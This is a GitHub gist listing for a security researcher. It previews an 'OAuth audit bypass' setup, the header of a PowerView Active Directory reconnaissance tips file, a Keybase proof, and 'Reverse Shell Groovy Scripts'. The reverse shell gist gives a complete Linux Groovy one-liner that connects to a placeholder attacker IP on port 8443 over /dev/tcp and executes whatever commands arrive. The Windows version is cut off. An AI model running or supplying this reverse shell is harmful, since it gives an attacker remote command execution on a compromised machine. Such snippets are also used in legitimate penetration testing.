Skip to content

Instantly share code, notes, and snippets.

View rootsecdev's full-sized avatar

rootsecdev

258 followers · 0 following
View GitHub Profile
@rootsecdev
rootsecdev / gist:994ff3dd7f18bbaff62abd1d979b1925
Last active March 13, 2024 22:27
Oauth Audit bypass to graph
Install AZ CLI:
az login --allow-no-subscription
Install MS Graph:
Install-Module Microsoft.Graph -Scope AllUsers
@rootsecdev
rootsecdev / GroovyScripts.md
Last active February 19, 2024 09:20
Reverse Shell Groovy Scripts

Groovy script for reverse shell (Linux):

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/your_attacker_ip/8443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()

Groovy script for reverse shell (Windows):

String host="your_attacker_ip";

@rootsecdev
rootsecdev / PowerView-3.0-tricks.ps1
Created October 8, 2021 02:43 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@rootsecdev
rootsecdev / keybase.md
Created March 23, 2019 04:58

Keybase proof

I hereby claim:

  • I am rootsecdev on github.
  • I am rootsecdev (https://keybase.io/rootsecdev) on keybase.
  • I have a public key ASCE_MA80HmLqvX0Z9ZcUEVTlTX53djDBj5qDjsX2Nbc3Ao

To claim this, I am signing this object: